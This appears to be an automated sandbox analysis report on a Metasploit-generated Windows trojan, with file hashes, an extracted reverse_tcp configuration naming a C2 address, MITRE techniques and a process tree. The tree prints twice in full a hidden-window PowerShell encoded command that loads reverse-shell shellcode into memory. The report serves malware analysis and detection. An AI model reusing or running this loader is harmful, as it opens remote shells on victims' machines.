metasploit | 690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6

General

Target

964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe
Size

17KB
MD5

b236486f7756776b56c743c03f7a106e
SHA1

964bc106798c2cfb951a19f8e59e1fcb5510ac23
SHA256

690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6
SHA512

42f3181244cb3d03cc5f08ede2dea275fadf2f3072f41c06eb8b3ffde3c33ad8fbbd8fb5a47f342b05664b6b553f3d330eb3610e61ff039cb0c1b0195572757d
SSDEEP

384:YfjcjwcOkjc5lPvL/c1fcrj8coFHPAel1rpI2cl1caXUCcYUlkX3nfT0f:ejcjwc1jc5B/c1fcrj8cccl1caXHc2X6

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.18.106:4535

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

968 powershell.exe

pid	process
968	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

968 powershell.exe
968 powershell.exe
4896 powershell.exe
4896 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 968 powershell.exe
Token: SeDebugPrivilege 4896 powershell.exe

pid	process
968	powershell.exe
968	powershell.exe
4896	powershell.exe
4896	powershell.exe

description	pid	process
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

964bc106798c2cfb951a19f8e59e1fcb5510ac23.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 720 wrote to memory of 3988	720	964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe	cmd.exe
PID 720 wrote to memory of 3988	720	964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe	cmd.exe
PID 3988 wrote to memory of 968	3988	cmd.exe	powershell.exe
PID 3988 wrote to memory of 968	3988	cmd.exe	powershell.exe
PID 968 wrote to memory of 4896	968	powershell.exe	powershell.exe
PID 968 wrote to memory of 4896	968	powershell.exe	powershell.exe
PID 968 wrote to memory of 4896	968	powershell.exe	powershell.exe
PID 4896 wrote to memory of 2268	4896	powershell.exe	csc.exe
PID 4896 wrote to memory of 2268	4896	powershell.exe	csc.exe
PID 4896 wrote to memory of 2268	4896	powershell.exe	csc.exe
PID 2268 wrote to memory of 4372	2268	csc.exe	cvtres.exe
PID 2268 wrote to memory of 4372	2268	csc.exe	cvtres.exe
PID 2268 wrote to memory of 4372	2268	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe
"C:\Users\Admin\AppData\Local\Temp\964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB3AGEARABpACAAPQAgACcAJAAwAFIAQwAyACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAUgBDADIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgA4ACwAMAB4ADgAOAAsADAAeAA5AGQALAAwAHgAMABiACwAMAB4AGMANwAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0AGUALAAwAHgAOQA5ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAYgAyACwAMAB4ADQAYQAsADAAeAA2ADIALAAwAHgAYgBjACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMQBkACwAMAB4ADMANAAsADAAeABhAGYALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAyADIALAAwAHgAYQA0ACwAMAB4AGUAZgAsADAAeAA5AGYALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgANgBiACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAOQA3ACwAMAB4ADEAOQAsADAAeABhADEALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAOQA3ACwAMAB4ADEAZQAsADAAeABhADEALAAwAHgAMQA5ACwAMAB4ADEAOAAsADAAeABjAGMALAAwAHgANgAxACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgAMABlACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgAZAA1ACwAMAB4AGMAMQAsADAAeABjAGIALAAwAHgAZABhACwAMAB4ADEAMgAsADAAeAA5ADQALAAwAHgAYQA2ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAYQBkACwAMAB4ADEAYgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQAwACwAMAB4ADQANwAsADAAeABlAGMALAAwAHgANQA1ACwAMAB4ADUAOAAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGEAYQAsADAAeAAyAGQALAAwAHgAOABjACwAMAB4ADkAMAAsADAAeABmAGEALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA4AGEALAAwAHgANwAxACwAMAB4ADAAMQAsADAAeAA3ADUALAAwAHgAYQBiACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADYAMgAsADAAeAAyAGMALAAwAHgAMwBmACwAMAB4AGMAYQAsADAAeAA4AGIALAAwAHgAOAA0ACwAMAB4AGIANAAsADAAeAAxADgALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeAAxAGQALAAwAHgANQAxACwAMAB4ADMAZQAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADUAZAAsADAAeABiADMALAAwAHgAYwA0ACwAMAB4AGEANQAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeABkAGQALAAwAHgAOQA4ACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAAwAGMALAAwAHgANAAwACwAMAB4AGIAYQAsADAAeAA0ADQALAAwAHgAYwA3ACwAMAB4AGYAMgAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADAANAAsADAAeAA2ADQALAAwAHgAZAA0ACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAZQAyACwAMAB4AGIAMgAsADAAeAA5AGUALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeABjADkALAAwAHgAOQBiACwAMAB4ADcAZAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAZQBkACwAMAB4AGIAYQAsADAAeAA3ADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAZAAyACwAMAB4ADcAMQAsADAAeABiADAALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeAAyAGUALAAwAHgAMQA0ACwAMAB4ADcANgAsADAAeAAyADkALAAwAHgAMwA5ACwAMAB4ADIAOAAsADAAeAA3ADcALAAwAHgAYgAxACwAMAB4ADQANgAsADAAeAA3ADQALAAwAHgAZQAwACwAMAB4ADcAZAAsADAAeAA4AGEALAAwAHgAOAA3ACwAMAB4AGYAMAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4AGYANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMANQAsADAAeAA5ADMALAAwAHgANgBlACwAMAB4ADMAZQAsADAAeAA5ADMALAAwAHgANgA0ACwAMAB4AGUANgAsADAAeAAyADgALAAwAHgAMgA0ACwAMAB4AGIAYQAsADAAeAA0ADAALAAwAHgAMwA4ACwAMAB4AGQAYgAsADAAeAAzAGIALAAwAHgAYgAxACwAMAB4ADEAMAAsADAAeAAxAGYALAAwAHgANgBmACwAMAB4AGUAMQAsADAAeAAwAGEALAAwAHgAYgA2ACwAMAB4ADEAMAAsADAAeAA2AGEALAAwAHgAYwBiACwAMAB4ADMANwAsADAAeABjADUALAAwAHgAMAA3ACwAMAB4AGMAMQAsADAAeABhAGYALAAwAHgAMgA2ACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAA4ADIALAAwAHgAZQA4ACwAMAB4ADgAOAAsADAAeABiADgALAAwAHgAMABhACwAMAB4ADAAZQAsADAAeABmAGEALAAwAHgAOQA2ACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAYgBhACwAMAB4ADQANgAsADAAeAAxAGQALAAwAHgANABmACwAMAB4ADUAMgAsADAAeAA4AGQALAAwAHgAOQAyACwAMAB4AGIAMAAsADAAeAA0ADIALAAwAHgAYQBlACwAMAB4ADcAOAAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4ADQAMQAsADAAeABkADUALAAwAHgAYgAxACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANwBjACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAMAA0ACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgANwA1ACwAMAB4ADgAZQAsADAAeAA1ADgALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAMQA0ACwAMAB4AGQAYgAsADAAeABhAGIALAAwAHgAOAA3ACwAMAB4ADYAMwAsADAAeAA4ADEALAAwAHgANwBkACwAMAB4ADkANwAsADAAeAA1ADkALAAwAHgAYQBjACwAMAB4ADgAMQAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADYANwAsADAAeABkADYALAAwAHgAYgA5ACwAMAB4ADYANAAsADAAeAA1AGUALAAwAHgAMQAwACwAMAB4ADYANgAsADAAeAA5ADYALAAwAHgAYgA1ACwAMAB4ADIAYgAsADAAeABhAGYALAAwAHgAMAAyACwAMAB4ADcANgAsADAAeAA0ADMALAAwAHgAZAAwACwAMAB4AGMAMgAsADAAeAA3ADYALAAwAHgAOQAzACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgANwA2ACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAZQA5ACwAMAB4ADIANAAsADAAeAAxAGUALAAwAHgAOAAxACwAMAB4ADIANAAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADEANAAsADAAeABjADcALAAwAHgAMAA4ACwAMAB4ADYAMAAsADAAeABiAGUALAAwAHgAYQBmACwAMAB4AGIANgAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4ADYAZgAsADAAeAA0ADgALAAwAHgAOABhACwAMAB4ADAAOAAsADAAeAA1ADMALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAYgBkACwAMAB4ADIAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBWAFEASgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATwBWAFEASgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQATwBWAFEASgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAYQBEAGkAKQApADsAJABFAHYAMwB2ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBGADAAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBGADAAIAAkAEUAdgAzAHYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQARQB2ADMAdgAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAB3AGEARABpACAAPQAgACcAJAAwAFIAQwAyACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAUgBDADIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgA4ACwAMAB4ADgAOAAsADAAeAA5AGQALAAwAHgAMABiACwAMAB4AGMANwAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0AGUALAAwAHgAOQA5ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAYgAyACwAMAB4ADQAYQAsADAAeAA2ADIALAAwAHgAYgBjACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMQBkACwAMAB4ADMANAAsADAAeABhAGYALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAyADIALAAwAHgAYQA0ACwAMAB4AGUAZgAsADAAeAA5AGYALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgANgBiACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAOQA3ACwAMAB4ADEAOQAsADAAeABhADEALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAOQA3ACwAMAB4ADEAZQAsADAAeABhADEALAAwAHgAMQA5ACwAMAB4ADEAOAAsADAAeABjAGMALAAwAHgANgAxACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgAMABlACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgAZAA1ACwAMAB4AGMAMQAsADAAeABjAGIALAAwAHgAZABhACwAMAB4ADEAMgAsADAAeAA5ADQALAAwAHgAYQA2ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAYQBkACwAMAB4ADEAYgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQAwACwAMAB4ADQANwAsADAAeABlAGMALAAwAHgANQA1ACwAMAB4ADUAOAAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGEAYQAsADAAeAAyAGQALAAwAHgAOABjACwAMAB4ADkAMAAsADAAeABmAGEALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA4AGEALAAwAHgANwAxACwAMAB4ADAAMQAsADAAeAA3ADUALAAwAHgAYQBiACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADYAMgAsADAAeAAyAGMALAAwAHgAMwBmACwAMAB4AGMAYQAsADAAeAA4AGIALAAwAHgAOAA0ACwAMAB4AGIANAAsADAAeAAxADgALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeAAxAGQALAAwAHgANQAxACwAMAB4ADMAZQAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADUAZAAsADAAeABiADMALAAwAHgAYwA0ACwAMAB4AGEANQAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeABkAGQALAAwAHgAOQA4ACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAAwAGMALAAwAHgANAAwACwAMAB4AGIAYQAsADAAeAA0ADQALAAwAHgAYwA3ACwAMAB4AGYAMgAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADAANAAsADAAeAA2ADQALAAwAHgAZAA0ACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAZQAyACwAMAB4AGIAMgAsADAAeAA5AGUALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeABjADkALAAwAHgAOQBiACwAMAB4ADcAZAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAZQBkACwAMAB4AGIAYQAsADAAeAA3ADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAZAAyACwAMAB4ADcAMQAsADAAeABiADAALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeAAyAGUALAAwAHgAMQA0ACwAMAB4ADcANgAsADAAeAAyADkALAAwAHgAMwA5ACwAMAB4ADIAOAAsADAAeAA3ADcALAAwAHgAYgAxACwAMAB4ADQANgAsADAAeAA3ADQALAAwAHgAZQAwACwAMAB4ADcAZAAsADAAeAA4AGEALAAwAHgAOAA3ACwAMAB4AGYAMAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4AGYANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMANQAsADAAeAA5ADMALAAwAHgANgBlACwAMAB4ADMAZQAsADAAeAA5ADMALAAwAHgANgA0ACwAMAB4AGUANgAsADAAeAAyADgALAAwAHgAMgA0ACwAMAB4AGIAYQAsADAAeAA0ADAALAAwAHgAMwA4ACwAMAB4AGQAYgAsADAAeAAzAGIALAAwAHgAYgAxACwAMAB4ADEAMAAsADAAeAAxAGYALAAwAHgANgBmACwAMAB4AGUAMQAsADAAeAAwAGEALAAwAHgAYgA2ACwAMAB4ADEAMAAsADAAeAA2AGEALAAwAHgAYwBiACwAMAB4ADMANwAsADAAeABjADUALAAwAHgAMAA3ACwAMAB4AGMAMQAsADAAeABhAGYALAAwAHgAMgA2ACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAA4ADIALAAwAHgAZQA4ACwAMAB4ADgAOAAsADAAeABiADgALAAwAHgAMABhACwAMAB4ADAAZQAsADAAeABmAGEALAAwAHgAOQA2ACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAYgBhACwAMAB4ADQANgAsADAAeAAxAGQALAAwAHgANABmACwAMAB4ADUAMgAsADAAeAA4AGQALAAwAHgAOQAyACwAMAB4AGIAMAAsADAAeAA0ADIALAAwAHgAYQBlACwAMAB4ADcAOAAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4ADQAMQAsADAAeABkADUALAAwAHgAYgAxACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANwBjACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAMAA0ACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgANwA1ACwAMAB4ADgAZQAsADAAeAA1ADgALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAMQA0ACwAMAB4AGQAYgAsADAAeABhAGIALAAwAHgAOAA3ACwAMAB4ADYAMwAsADAAeAA4ADEALAAwAHgANwBkACwAMAB4ADkANwAsADAAeAA1ADkALAAwAHgAYQBjACwAMAB4ADgAMQAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADYANwAsADAAeABkADYALAAwAHgAYgA5ACwAMAB4ADYANAAsADAAeAA1AGUALAAwAHgAMQAwACwAMAB4ADYANgAsADAAeAA5ADYALAAwAHgAYgA1ACwAMAB4ADIAYgAsADAAeABhAGYALAAwAHgAMAAyACwAMAB4ADcANgAsADAAeAA0ADMALAAwAHgAZAAwACwAMAB4AGMAMgAsADAAeAA3ADYALAAwAHgAOQAzACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgANwA2ACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAZQA5ACwAMAB4ADIANAAsADAAeAAxAGUALAAwAHgAOAAxACwAMAB4ADIANAAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADEANAAsADAAeABjADcALAAwAHgAMAA4ACwAMAB4ADYAMAAsADAAeABiAGUALAAwAHgAYQBmACwAMAB4AGIANgAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4ADYAZgAsADAAeAA0ADgALAAwAHgAOABhACwAMAB4ADAAOAAsADAAeAA1ADMALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAYgBkACwAMAB4ADIAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBWAFEASgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATwBWAFEASgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQATwBWAFEASgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAYQBEAGkAKQApADsAJABFAHYAMwB2ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBGADAAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAg